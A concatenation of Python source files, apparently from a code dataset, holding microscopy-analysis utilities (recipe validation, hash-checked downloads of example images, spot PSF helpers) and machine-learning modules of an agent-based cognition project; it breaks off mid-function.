# ### Recipe management (sanity checks, fitting) ###
def check_recipe(recipe, data_directory=None):
"""Check and validate a recipe.
Checking a recipe consists in validating its filename pattern and the
content of the dictionary.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
data_directory : str
Path of the directory with the files describes in the recipe. If it is
provided, the function check that the files exist.
Returns
-------
_ : bool
Assert if the recipe is well formatted.
"""
# check parameters
check_parameter(recipe=dict,
data_directory=(str, type(None)))
# check the filename pattern
if "pattern" not in recipe:
raise KeyError("A recipe should have a filename pattern "
"('pattern' keyword).")
recipe_pattern = recipe["pattern"]
if not isinstance(recipe_pattern, str):
raise TypeError("'pattern' should be a string, not a {0}."
.format(type(recipe_pattern)))
# count the different dimensions to combinate in the recipe (among
# 'fov', 'r', 'c' and 'z')
dimensions = re.findall("fov|r|c|z", recipe_pattern)
# each dimension can only appear once in the filename pattern
if len(dimensions) != len(set(dimensions)):
raise ValueError("The pattern used in recipe is wrong, a dimension "
"appears several times: {0}".format(recipe_pattern))
# check keys and values of the recipe
for key, value in recipe.items():
if key not in ['fov', 'r', 'c', 'z', 'ext', 'opt', 'pattern']:
raise KeyError("The recipe can only contain the keys 'fov', 'r', "
"'c', 'z', 'ext', 'opt' or 'pattern'. Not '{0}'."
.format(key))
if not isinstance(value, (list, str)):
raise TypeError("A recipe can only contain lists or strings, "
"not {0}.".format(type(value)))
# check that requested files exist
if data_directory is not None:
if not os.path.isdir(data_directory):
raise NotADirectoryError("Directory does not exist: {0}"
.format(data_directory))
recipe = fit_recipe(recipe)
nb_r, nb_c, nb_z = get_nb_element_per_dimension(recipe)
nb_fov = count_nb_fov(recipe)
for fov in range(nb_fov):
for r in range(nb_r):
for c in range(nb_c):
for z in range(nb_z):
path = get_path_from_recipe(recipe, data_directory,
fov=fov, r=r, c=c, z=z)
if not os.path.isfile(path):
raise FileNotFoundError("File does not exist: {0}"
.format(path))
return True
def fit_recipe(recipe):
"""Fit a recipe.
Fitting a recipe consists in wrapping every values of `fov`, `r`, `c` and
`z` in a list (an empty one if necessary). Values for `ext` and `opt` are
also initialized.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
new_recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` and `opt`, initialized if
necessary.
"""
# check parameters
check_parameter(recipe=dict)
# initialize recipe
new_recipe = copy.deepcopy(recipe)
# initialize and fit the dimensions 'fov', 'r', 'c' and 'z'
for key in ['fov', 'r', 'c', 'z']:
if key not in new_recipe:
new_recipe[key] = [None]
value = new_recipe[key]
if isinstance(value, str):
new_recipe[key] = [value]
# initialize the dimensions 'ext', 'opt'
for key in ['ext', 'opt']:
if key not in new_recipe:
new_recipe[key] = ""
return new_recipe
def _is_recipe_fitted(recipe):
"""Check if a recipe is ready to be used.
Fitting a recipe consists in wrapping every values of `fov`, `r`, `c` and
`z` in a list (an empty one if necessary). Values for `ext` and `opt` are
also initialized.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
_ : bool
Indicates if the recipe is fitted or not
"""
# all keys should be initialized in the new recipe, with a list or a string
for key in ['fov', 'r', 'c', 'z']:
if key not in recipe or not isinstance(recipe[key], list):
return False
for key in ['ext', 'opt']:
if key not in recipe or not isinstance(recipe[key], str):
return False
if 'pattern' not in recipe or not isinstance(recipe['pattern'], str):
return False
return True
def get_path_from_recipe(recipe, input_folder, fov=0, r=0, c=0, z=0):
"""Build the path of a file from a recipe and the indices of specific
elements.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
input_folder : str
Path of the folder containing the images.
fov : int
Index of the `fov` element in the recipe to use in the filename.
r : int
Index of the `r` element in the recipe to use in the filename.
c : int
Index of the `c` element in the recipe to use in the filename.
z : int
Index of the `z` element in the recipe to use in the filename.
Returns
-------
path : str
Path of the file to load.
"""
# check parameters
check_parameter(recipe=dict,
input_folder=str,
fov=int,
r=int,
c=int,
z=int)
# check if the recipe is fitted
if not _is_recipe_fitted(recipe):
recipe = fit_recipe(recipe)
# build a map of the elements' indices
map_element_index = {"fov": fov, "r": r, "c": c, "z": z}
# get filename pattern and decompose it
recipe_pattern = recipe["pattern"]
path_elements = re.findall("fov|r|c|z|ext|opt", recipe_pattern)
path_separators = re.split("fov|r|c|z|ext|opt", recipe_pattern)
# get filename recombining elements of the recipe
filename = path_separators[0] # usually an empty string
for (element_name, separator) in zip(path_elements, path_separators[1:]):
# if we need an element from a list of elements of the same dimension
# (eg. to pick a specific channel 'c' among a list of channels)
if element_name in map_element_index:
element_index = map_element_index[element_name]
element = recipe[element_name][element_index]
# if this element is unique for all the recipe (eg. 'fov')
else:
element = recipe[element_name]
# the filename is built ensuring the order of apparition of the
# different morphemes and their separators
filename += element
filename += separator
# get path
path = os.path.join(input_folder, filename)
return path
def get_nb_element_per_dimension(recipe):
"""Count the number of element to stack for each dimension (`r`, `c`
and `z`).
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Only contain the keys
`fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
nb_r : int
Number of rounds to be stacked.
nb_c : int
Number of channels to be stacked.
nb_z : int
Number of z layers to be stacked.
"""
# check parameters
check_parameter(recipe=dict)
# check if the recipe is fitted
if not _is_recipe_fitted(recipe):
recipe = fit_recipe(recipe)
return len(recipe["r"]), len(recipe["c"]), len(recipe["z"])
def count_nb_fov(recipe):
"""Count the number of different fields of view that can be defined from
the recipe.
Parameters
----------
recipe : dict
Map the images according to their field of view, their round,
their channel and their spatial dimensions. Can only contain the keys
`pattern`, `fov`, `r`, `c`, `z`, `ext` or `opt`.
Returns
-------
nb_fov : int
Number of different fields of view in the recipe.
"""
# check parameters
check_parameter(recipe=dict)
# check if the recipe is fitted
if not _is_recipe_fitted(recipe):
recipe = fit_recipe(recipe)
# a good recipe should have a list in the 'fov' key
if not isinstance(recipe["fov"], list):
raise TypeError("'fov' should be a List or a str, not {0}"
.format(type(recipe["fov"])))
else:
return len(recipe["fov"])
def check_datamap(data_map):
"""Check and validate a data map.
Checking a data map consists in validating the recipe-folder pairs.
Parameters
----------
data_map : List[tuple]
Map between input directories and recipes.
Returns
-------
_ : bool
Assert if the data map is well formatted.
"""
check_parameter(data_map=list)
for pair in data_map:
if not isinstance(pair, (tuple, list)):
raise TypeError("A data map is a list with tuples or lists. "
"Not {0}".format(type(pair)))
if len(pair) != 2:
raise ValueError("Elements of a data map are tuples or lists that "
"map a recipe (dict) to an input directory "
"(string). Here {0} elements are given {1}"
.format(len(pair), pair))
(recipe, input_folder) = pair
if not isinstance(input_folder, str):
raise TypeError("A data map map a recipe (dict) to an input "
"directory (string). Not ({0}, {1})"
.format(type(recipe), type(input_folder)))
check_recipe(recipe, data_directory=input_folder)
return True
# ### Sanity checks parameters ###
def check_parameter(**kwargs):
"""Check dtype of the function's parameters.
Parameters
----------
kwargs : Type or Tuple[Type]
Map of each parameter with its expected dtype.
Returns
-------
_ : bool
Assert if the array is well formatted.
"""
# get the frame and the parameters of the function
frame = inspect.currentframe().f_back
_, _, _, values = inspect.getargvalues(frame)
# compare each parameter with its expected dtype
for arg in kwargs:
expected_dtype = kwargs[arg]
parameter = values[arg]
if not isinstance(parameter, expected_dtype):
actual = "'{0}'".format(type(parameter).__name__)
if isinstance(expected_dtype, tuple):
target = ["'{0}'".format(x.__name__) for x in expected_dtype]
target = "(" + ", ".join(target) + ")"
else:
target = expected_dtype.__name__
raise TypeError("Parameter {0} should be a {1}. It is a {2} "
"instead.".format(arg, target, actual))
return True
# ### Constants ###
def get_margin_value():
"""Return the margin pixel around a cell coordinate used to define its
bounding box.
Returns
-------
_ : int
Margin value (in pixels).
"""
# should be greater or equal to 2 (maybe 1 is enough)
return 5
def get_eps_float32():
"""Return the epsilon value for a 32 bit float.
Returns
-------
_ : np.float32
Epsilon value.
"""
return np.finfo(np.float32).eps
# ### Fetch data ###
def load_and_save_url(remote_url, directory, filename=None):
"""Download remote data and save them
Parameters
----------
remote_url : str
Remote url of the data to download.
directory : str
Directory to save the download content.
filename : str
Filename of the object to save.
Returns
-------
path : str
Path of the downloaded file.
"""
# check parameters
check_parameter(remote_url=str,
directory=str,
filename=(str, type(None)))
# get output path
if filename is None:
filename = remote_url.split("/")[-1]
path = os.path.join(directory, filename)
# download and save data
urlretrieve(remote_url, path)
return path
def check_hash(path, expected_hash):
"""Check hash value of a file.
Parameters
----------
path : str
Path of the file to check.
expected_hash : str
Expected hash value.
Returns
-------
_ : bool
True if hash values match.
"""
# check parameter
check_parameter(path=str,
expected_hash=str)
# compute hash value
hash_value = compute_hash(path)
# compare checksum
if hash_value != expected_hash:
raise IOError("File {0} has an SHA256 checksum ({1}) differing from "
"expected ({2}). File may be corrupted."
.format(path, hash_value, expected_hash))
return True
def compute_hash(path):
"""Compute sha256 hash of a file.
Parameters
----------
path : str
Path to read the file.
Returns
-------
sha256 : str
Hash value of the file.
"""
# check parameters
check_parameter(path=str)
# initialization
sha256hash = hashlib.sha256()
chunk_size = 8192
# open and read file
with open(path, "rb") as f:
while True:
buffer = f.read(chunk_size)
if not buffer:
break
sha256hash.update(buffer)
# compute hash
sha256 = sha256hash.hexdigest()
return sha256
def check_input_data(input_directory, input_segmentation=False):
"""Check input images exists and download them if necessary.
Parameters
----------
input_directory : str
Path of the image directory.
input_segmentation : bool
Check 2-d example images for segmentation.
"""
# parameters
filename_input_dapi = "experiment_1_dapi_fov_1.tif"
url_input_dapi = "https://github.com/fish-quant/big-fish-examples/releases/download/data/experiment_1_dapi_fov_1.tif"
hash_input_dapi = "3ce6dcfbece75da41326943432ada4cc9bacd06750e59dc2818bb253b6e7fdcd"
filename_input_smfish = "experiment_1_smfish_fov_1.tif"
url_input_smfish = "https://github.com/fish-quant/big-fish-examples/releases/download/data/experiment_1_smfish_fov_1.tif"
hash_input_smfish = "bc6aec1f3da4c25f3c6b579c274584ce1e88112c7f980e5437b5ad5223bc8ff6"
filename_input_nuc_full = "example_nuc_full.tif"
url_input_nuc_full = "https://github.com/fish-quant/big-fish-examples/releases/download/data/example_nuc_full.tif"
hash_input_nuc_full = "3bf70c7b5a02c60725baba3dfddff3010e0957de9ab78f0f65166248ead84ec4"
filename_input_cell_full = "example_cell_full.tif"
url_input_cell_full = "https://github.com/fish-quant/big-fish-examples/releases/download/data/example_cell_full.tif"
hash_input_cell_full = "36981955ed97e9cab8a69241140a9aac3bdcf32dc157d6957fd37edcb16b34bd"
# check if input dapi image exists
path = os.path.join(input_directory, filename_input_dapi)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_dapi)
print("{0} is already in the directory"
.format(filename_input_dapi))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_dapi))
print("downloading {0}...".format(filename_input_dapi))
load_and_save_url(url_input_dapi,
input_directory,
filename_input_dapi)
check_hash(path, hash_input_dapi)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_dapi))
load_and_save_url(url_input_dapi,
input_directory,
filename_input_dapi)
check_hash(path, hash_input_dapi)
# check if input smfish image exists
path = os.path.join(input_directory, filename_input_smfish)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_smfish)
print("{0} is already in the directory"
.format(filename_input_smfish))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_smfish))
print("downloading {0}...".format(filename_input_smfish))
load_and_save_url(url_input_smfish,
input_directory,
filename_input_smfish)
check_hash(path, hash_input_smfish)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_smfish))
load_and_save_url(url_input_smfish,
input_directory,
filename_input_smfish)
check_hash(path, hash_input_smfish)
# stop here or check segmentation examples
if input_segmentation:
# check if example nucleus exists
path = os.path.join(input_directory, filename_input_nuc_full)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_nuc_full)
print("{0} is already in the directory"
.format(filename_input_nuc_full))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_nuc_full))
print("downloading {0}...".format(filename_input_nuc_full))
load_and_save_url(url_input_nuc_full,
input_directory,
filename_input_nuc_full)
check_hash(path, hash_input_nuc_full)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_nuc_full))
load_and_save_url(url_input_nuc_full,
input_directory,
filename_input_nuc_full)
check_hash(path, hash_input_nuc_full)
# check if example cell exists
path = os.path.join(input_directory, filename_input_cell_full)
if os.path.isfile(path):
# check that image is not corrupted
try:
check_hash(path, hash_input_cell_full)
print("{0} is already in the directory"
.format(filename_input_cell_full))
# otherwise download it
except IOError:
print("{0} seems corrupted".format(filename_input_cell_full))
print("downloading {0}...".format(filename_input_cell_full))
load_and_save_url(url_input_cell_full,
input_directory,
filename_input_cell_full)
check_hash(path, hash_input_cell_full)
# if file does not exist we directly download it
else:
print("downloading {0}...".format(filename_input_cell_full))
load_and_save_url(url_input_cell_full,
input_directory,
filename_input_cell_full)
check_hash(path, hash_input_cell_full)
# ### Computation ###
def moving_average(array, n):
"""Compute a trailing average.
Parameters
----------
array : np.ndarray
Array used to compute moving average.
n : int
Window width of the moving average.
Returns
-------
results : np.ndarray
Moving average values.
"""
# check parameter
check_parameter(n=int)
check_array(array, ndim=1)
# compute moving average
cumsum = [0]
results = []
for i, x in enumerate(array, 1):
cumsum.append(cumsum[i-1] + x)
if i >= n:
ma = (cumsum[i] - cumsum[i - n]) / n
results.append(ma)
results = np.array(results)
return results
def centered_moving_average(array, n):
"""Compute a centered moving average.
Parameters
----------
array : np.ndarray
Array used to compute moving average.
n : int
Window width of the moving average.
Returns
-------
results : np.ndarray
Centered moving average values.
"""
# check parameter
check_parameter(n=int)
check_array(array, ndim=1)
# pad array to keep the same length and centered the outcome
if n % 2 == 0:
r = int(n / 2)
n += 1
else:
r = int((n - 1) / 2)
array_padded = np.pad(array, pad_width=r, mode="reflect")
# compute centered moving average
results = moving_average(array_padded, n)
return results
# ### Spot utilities ###
def get_sigma(voxel_size_z=None, voxel_size_yx=100, psf_z=None, psf_yx=200):
"""Compute the standard deviation of the PSF of the spots.
Parameters
----------
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we consider
a 2-d PSF.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
psf_z : int or float or None
Theoretical size of the PSF emitted by a spot in the z plan, in
nanometer. If None, we consider a 2-d PSF.
psf_yx : int or float
Theoretical size of the PSF emitted by a spot in the yx plan, in
nanometer.
Returns
-------
sigma : Tuple[float]
Standard deviations in pixel of the PSF, one element per dimension.
"""
# check parameters
check_parameter(voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
psf_z=(int, float, type(None)),
psf_yx=(int, float))
# compute sigma
sigma_yx = psf_yx / voxel_size_yx
if voxel_size_z is None or psf_z is None:
return sigma_yx, sigma_yx
else:
sigma_z = psf_z / voxel_size_z
return sigma_z, sigma_yx, sigma_yx
def get_radius(voxel_size_z=None, voxel_size_yx=100, psf_z=None, psf_yx=200):
"""Approximate the radius of the detected spot.
We use the formula:
.. math::
\\mbox{radius} = \\mbox{sqrt(ndim)} * \\sigma
with :math:`\\mbox{ndim}` the number of dimension of the image and
:math:`\\sigma` the standard deviation (in pixel) of the detected spot.
Parameters
----------
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we consider
a 2-d spot.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
psf_z : int or float or None
Theoretical size of the PSF emitted by a spot in the z plan, in
nanometer. If None, we consider a 2-d spot.
psf_yx : int or float
Theoretical size of the PSF emitted by a spot in the yx plan, in
nanometer.
Returns
-------
radius : Tuple[float]
Radius in pixels of the detected spots, one element per dimension.
"""
# compute sigma
sigma = get_sigma(voxel_size_z, voxel_size_yx, psf_z, psf_yx)
# compute radius
radius = [np.sqrt(len(sigma)) * sigma_ for sigma_ in sigma]
radius = tuple(radius)
return radius
``` |
{
"source": "4dnucleome/cog-abm",
"score": 3
} |
#### File: cog_abm/agent/sensor.py
```python
from ..extras.tools import abstract
from ..ML.diversity import new_sample_specified_attributes
class Sensor(object):
""" Basic sensor.
"""
def sense(self, item):
abstract()
class SimpleSensor(Sensor):
""" Just gives back what he got """
def __init__(self, mask=None):
self.mask = mask
def sense(self, item):
if self.mask is None:
return item
else:
return new_sample_specified_attributes(item, self.mask)
```
#### File: cog_abm/extras/color.py
```python
from cog_abm.ML.core import Sample, euclidean_distance
class Color(Sample):
"""
Color represented in CIE L*a*b* space
"""
def __init__(self, L, a, b):
"""
Initialize Color
http://en.wikipedia.org/wiki/Lab_color_space
section: Range_of_L.2Aa.2Ab.2A_coordinates
@param L: lightness - should be in [0,100]
@param a: can be negative
@param b: can be negative
"""
super(Color, self).__init__([L, a, b], dist_fun=euclidean_distance)
self.L = L
self.a = a
self.b = b
def get_WCS_colors():
from cog_abm.extras.parser import Parser
import os
return Parser().parse_environment(
os.path.join(os.path.dirname(__file__), "330WCS.xml")).stimuli
def get_1269Munsell_chips():
from cog_abm.extras.parser import Parser
import os
return Parser().parse_environment(os.path.join(os.path.dirname(__file__),
"1269_munsell_chips.xml")).stimuli
```
#### File: cog_abm/ML/core.py
```python
import math
from itertools import izip
from random import shuffle
from scipy.io.arff import loadarff
from cog_abm.extras.tools import flatten
class Classifier(object):
def classify(self, sample):
pass
def classify_pval(self, sample):
"""
Returns tuple with class and probability of sample belonging to it
"""
pass
def class_probabilities(self, sample):
"""
Returns dict with mapping class->probability that sample belongs to it
"""
pass
def train(self, samples):
pass
def clone(self):
"""
Returns copy of classifier. This is default implementation.
Should be overriden in subclasses.
@rtype: Classifier
@return: New instance of classifier.
"""
import copy
return copy.deepcopy(self)
class Attribute(object):
ID = None
""" This class field is for id when putting some conversion method in dict
"""
def get_value(self, value):
''' value is inner representation
'''
pass
def set_value(self, value):
''' value is outer representation
'''
return value
def __eq__(self, other):
return self.ID == other.ID
class NumericAttribute(Attribute):
ID = "NumericAttribute"
def get_value(self, value):
return value
class NominalAttribute(Attribute):
ID = "NominalAttribute"
def __init__(self, symbols):
"""
Symbols should be strings!
For example Orange doesn't support any other format
"""
symbols = [str(s) for s in symbols]
self.symbols = tuple(s for s in symbols)
self.mapping = dict(reversed(x) for x in enumerate(self.symbols))
self.tmp_rng = set(xrange(len(self.symbols)))
def get_symbol(self, idx):
return self.symbols[idx]
def get_idx(self, symbol):
return self.mapping[str(symbol)]
def get_value(self, value):
return self.get_symbol(value)
def set_value(self, value):
return self.set_symbol(value)
def set_symbol(self, symbol):
return self.get_idx(symbol)
def __eq__(self, other):
return super(NominalAttribute, self).__eq__(other) and \
set(self.symbols) == set(other.symbols)
class Sample(object):
def __init__(self, values, meta=None, cls=None, cls_meta=None,
dist_fun=None, last_is_class=False, cls_idx=None):
self.values = values[:]
self.meta = meta or [NumericAttribute() for _ in values]
if last_is_class or cls_idx is not None:
if last_is_class:
cls_idx = -1
self.cls_meta = self.meta[cls_idx]
self.cls = self.values[cls_idx]
self.meta = self.meta[:]
del self.values[cls_idx], self.meta[cls_idx]
else:
self.cls = cls
self.cls_meta = cls_meta
if dist_fun is None and \
all(attr.ID == NumericAttribute.ID for attr in self.meta):
self.dist_fun = euclidean_distance
else:
self.dist_fun = dist_fun
def get_cls(self):
if self.cls_meta is None or self.cls is None:
return None
return self.cls_meta.get_value(self.cls)
def get_values(self):
return [m.get_value(v) for v, m in izip(self.values, self.meta)]
def distance(self, other):
return self.dist_fun(self, other)
def __eq__(self, other):
return self.cls == other.cls and self.cls_meta == other.cls_meta and \
self.meta == other.meta and self.values == other.values
def __hash__(self):
return 3 * hash(tuple(self.values)) + 5 * hash(self.cls)
def __str__(self):
return "({0}, {1})".format(str(self.get_values()), self.get_cls())
def __repr__(self):
return str(self)
def copy_basic(self):
return Sample(self.values, self.meta, dist_fun=self.dist_fun)
def copy_full(self):
return Sample(self.values, self.meta, self.cls, self.cls_meta,
self.dist_fun)
def copy_set_cls(self, cls, meta):
s = self.copy_basic()
s.cls_meta = meta
s.cls = meta.set_value(cls)
return s
#Sample distance functions
def euclidean_distance(sx, sy):
return math.sqrt(math.fsum([
(x - y) * (x - y) for x, y in izip(sx.get_values(), sy.get_values())
]))
def load_samples_arff(file_name, last_is_class=False, look_for_cls=True):
a_data, a_meta = loadarff(file_name)
names = a_meta.names()
attr = {"nominal": lambda attrs: NominalAttribute(attrs),
"numeric": lambda _: NumericAttribute()}
gen = (a_meta[n] for n in names)
meta = [attr[a[0]](a[1]) for a in gen]
cls_idx = None
if look_for_cls:
for i, name in enumerate(names):
if a_meta[name][0] == "nominal" and name.lower() == "class":
cls_idx = i
break
def create_sample(s):
values = [mi.set_value(vi) for mi, vi in izip(meta, s)]
return \
Sample(values, meta, last_is_class=last_is_class, cls_idx=cls_idx)
return [create_sample(s) for s in a_data]
def split_data(data, train_ratio=2. / 3.):
""" data - samples to split into two sets: train and test
train_ratio - real number in [0,1]
returns (train, test) - pair of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
train = [s for i, s in enumerate(tmp) if i < train_ratio * len(tmp)]
test = [s for i, s in enumerate(tmp) if i >= train_ratio * len(tmp)]
return (train, test)
def split_data_cv(data, folds=8):
""" data - samples to split into two sets *folds* times
returns [(train, test), ...] - list of pairs of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
N = len(tmp)
M = N / folds
overflow = N % folds
splits = []
i = 0
while i < N:
n = M
if overflow > 0:
overflow -= 1
n += 1
split = tmp[i:i + n]
splits.append(split)
i += n
return [(flatten(splits[:i] + splits[i + 1:]), splits[i])
for i in xrange(folds)]
```
#### File: cog_abm/ML/diversity.py
```python
import random
from itertools import izip
from core import Classifier, Sample, split_data
# Methods suposed to introduce diversity:
# * using only subset of attributes
def new_sample_specified_attributes(sample, mask):
""" mask[i] == True if we want to keep this attribute
"""
f = lambda v: [x for x, b in izip(v, mask) if b]
values, meta = f(sample.values), f(sample.meta)
return Sample(values, meta, cls=sample.cls, cls_meta=sample.cls_meta,
dist_fun=sample.dist_fun)
def gen_bitmap(length, num_missing):
mask = [True for _ in xrange(length - num_missing)] + \
[False for _ in xrange(num_missing)]
random.shuffle(mask)
return mask
def random_attribute_selection(samples, num_deleted=2):
mask = gen_bitmap(len(samples.meta), num_deleted)
return [new_sample_specified_attributes(s, mask) for s in samples]
# * using only specified ratio of samples in learning
def random_subset_of_samples(samples, ratio):
return split_data(samples, ratio)[0]
# Wrappers around classifiers to make things easier
class ClassifierSubsetOfAttrs(Classifier):
def __init__(self, classifier, present_ratio=None, num_missing=None):
self.classifier = classifier
self.num_missing = num_missing
self.present_ratio = present_ratio
self.attrs_mask = None
def classify(self, sample):
sample = new_sample_specified_attributes(sample, self.attrs_mask)
return self.classifier.classify(sample)
def classify_pval(self, sample):
sample = new_sample_specified_attributes(sample, self.attrs_mask)
return self.classifier.classify_pval(sample)
def class_probabilities(self, sample):
sample = new_sample_specified_attributes(sample, self.attrs_mask)
return self.classifier.class_probabilities(sample)
def train(self, samples):
num_attrs = len(samples[0].values)
if self.present_ratio is not None:
self.num_missing = int((1. - self.present_ratio) * num_attrs)
self.attrs_mask = gen_bitmap(num_attrs, self.num_missing)
samples = [new_sample_specified_attributes(s, self.attrs_mask)
for s in samples]
self.classifier.train(samples)
class ClassifierSubsetOfTraining(Classifier):
def __init__(self, classifier, present_ratio=None, num_missing=None):
self.classifier = classifier
self.num_missing = num_missing
self.present_ratio = present_ratio
self.attrs_mask = None
def classify(self, sample):
return self.classifier.classify(sample)
def classify_pval(self, sample):
return self.classifier.classify_pval(sample)
def class_probabilities(self, sample):
return self.classifier.class_probabilities(sample)
def train(self, samples):
num = len(samples)
if self.present_ratio is not None:
num_to_learn = int(self.present_ratio * num)
else:
num_to_learn = max(0, num - self.num_missing)
samples = [x for x in samples]
random.shuffle(samples)
samples = samples[:num_to_learn]
self.classifier.train(samples)
```
#### File: cog_abm/ML/measurement.py
```python
import time
from statistics import correct
def timeit(fun, *args, **kwargs):
start = time.time()
ret = fun(*args, **kwargs)
elapsed = time.time() - start
return (ret, elapsed)
def analyse_classifier(classifier, d_train, d_test):
train_t = timeit(classifier.train, d_train)[1]
corr, test_t = timeit(correct, classifier, d_test)
return corr, train_t, test_t
```
#### File: cog_abm/ML/orange_wrapper.py
```python
import orange, orngSVM, orngEnsemble
import core
from itertools import izip
orange_learners_modules = [orange, orngSVM, orngEnsemble]
#useful methods
def create_numeric_variable(sid, meta):
return orange.FloatVariable(sid)
def create_nominal_variable(sid, meta):
return orange.EnumVariable(sid, values=[str(e) for e in meta.symbols])
orange_variable_map = {
core.NumericAttribute.ID: create_numeric_variable,
core.NominalAttribute.ID: create_nominal_variable
}
def create_basic_variables(meta):
return [orange_variable_map[m.ID]("atr"+str(i), m)
for i,m in enumerate(meta)]
def create_domain_with_cls(meta, cls_meta):
l = create_basic_variables(meta)
l.append(create_nominal_variable("classAttr",cls_meta))
return orange.Domain(l, True)
def _basic_convert_sample(domain, sample):
return [orange.Value(dv, v) for dv, v in
izip(domain, sample.get_values())]
def convert_sample(domain, sample):
tmp = _basic_convert_sample(domain, sample)
return orange.Example(domain, tmp+[None])
#this should work if cls is in domain
def convert_sample_with_cls(domain, sample):
tmp = _basic_convert_sample(domain, sample)
return orange.Example(domain, tmp + [domain.classVar(sample.get_cls())])
def get_orange_classifier_class(name, module=None):
if module is None:
for module in orange_learners_modules:
try:
classifier_class = getattr(module, name)
return classifier_class
except AttributeError:
pass
return None
else:
module = __import__(module)
# TODO i think that this won't work if module contains dot
return getattr(module, name)
class OrangeClassifier(core.Classifier):
def __init__(self, name, *args, **kargs):
self.classifier_class = get_orange_classifier_class(name,
module=kargs.get('module', None))
if self.classifier_class is None:
raise ValueError("No %s learner in orange libs", name)
self.classifier_args = args
self.classifier_kargs = kargs
self.domain_with_cls = None
self._create_new_classifier()
def _create_new_classifier(self):
self.classifier = self.classifier_class(*self.classifier_args, \
**self.classifier_kargs)
def _extract_value(self, cls):
return cls.value
def classify(self, sample):
if self.domain_with_cls is None:
return None
s = convert_sample(self.domain_with_cls, sample)
return self._extract_value(self.classifier(s))
# TODO: I think that parent method should be fine
# def clone(self):
# return None
def classify_pval(self, sample):
if self.domain_with_cls is None:
return None
s = convert_sample(self.domain_with_cls, sample)
v, p = self.classifier(s, orange.GetBoth)
return (self._extract_value(v), p[v])
def class_probabilities(self, sample):
if self.domain_with_cls is None:
return None
s = convert_sample(self.domain_with_cls, sample)
probs = self.classifier(s, orange.GetProbabilities)
d = dict(probs.items())
return d
def train(self, samples):
"""
Trains classifier with given samples.
We recreate domain, because new class could be added
"""
if not samples:
self.domain_with_cls = None
return
meta = samples[0].meta
cls_meta = samples[0].cls_meta
self.domain_with_cls = create_domain_with_cls(meta, cls_meta)
et = orange.ExampleTable(self.domain_with_cls)
et.extend([convert_sample_with_cls(self.domain_with_cls, s)
for s in samples])
self._create_new_classifier()
self.classifier = self.classifier(et)
# self.classifier = self.classifier_class(et, *self.classifier_args,\
# **self.classifier_kargs)
```
#### File: cog_abm/ML/statistics.py
```python
import math
from collections import namedtuple
from itertools import combinations, groupby
from cog_abm.extras.tools import avg, calc_std, calc_auc
def calc_basic_rates(classifier, samples, positive_class):
positive_class = str(positive_class)
sc = [(s, s.get_cls()) for s in samples]
positive = set(s for s, c in sc if c == positive_class)
negative = set(s for s, c in sc if c != positive_class)
tp = [classifier.classify(s) for s in positive].count(positive_class)
fp = [classifier.classify(s) for s in negative].count(positive_class)
tn = len(negative) - fp
fn = len(positive) - tp
return tuple(float(x) for x in (tp, tn, fp, fn))
def basic_rates_based(fn):
def calculator(classifier, samples, positive_class, basic_rates=None):
if basic_rates is None:
basic_rates = calc_basic_rates(classifier, samples, positive_class)
try:
return fn(classifier, samples, positive_class, basic_rates)
except ZeroDivisionError:
return 0.
return calculator
# from http://en.wikipedia.org/wiki/Receiver_operating_characteristic
# passing basic_rates for speed up
@basic_rates_based
def TPR(classifier, samples, positive_class, basic_rates=None):
tp, _, _, fn = basic_rates
return tp / (tp + fn)
def sensitivity(classifier, samples, positive_class, basic_rates=None):
return TPR(classifier, samples, positive_class, basic_rates)
def recall(classifier, samples, positive_class, basic_rates=None):
return TPR(classifier, samples, positive_class, basic_rates)
@basic_rates_based
def FPR(classifier, samples, positive_class, basic_rates=None):
_, tn, fp, _ = basic_rates
return fp / (fp + tn)
@basic_rates_based
def accuracy(classifier, samples, positive_class, basic_rates=None):
tp, tn, fp, fn = basic_rates
return (tp + tn) / (tp + tn + fp + fn)
def TNR(classifier, samples, positive_class, basic_rates=None):
return 1. - FPR(classifier, samples, positive_class, basic_rates)
def specificity(classifier, samples, positive_class, basic_rates=None):
return TNR(classifier, samples, positive_class, basic_rates)
@basic_rates_based
def PPV(classifier, samples, positive_class, basic_rates=None):
tp, _, fp, _ = basic_rates
return tp / (tp + fp)
def precision(classifier, samples, positive_class, basic_rates=None):
return PPV(classifier, samples, positive_class, basic_rates)
@basic_rates_based
def NPV(classifier, samples, positive_class, basic_rates=None):
_, tn, _, fn = basic_rates
return tn / (tn + fn)
@basic_rates_based
def FDR(classifier, samples, positive_class, basic_rates=None):
tp, _, fp, _ = basic_rates
return fp / (fp + tp)
@basic_rates_based
def MCC(classifier, samples, positive_class, basic_rates=None):
tp, tn, fp, fn = basic_rates
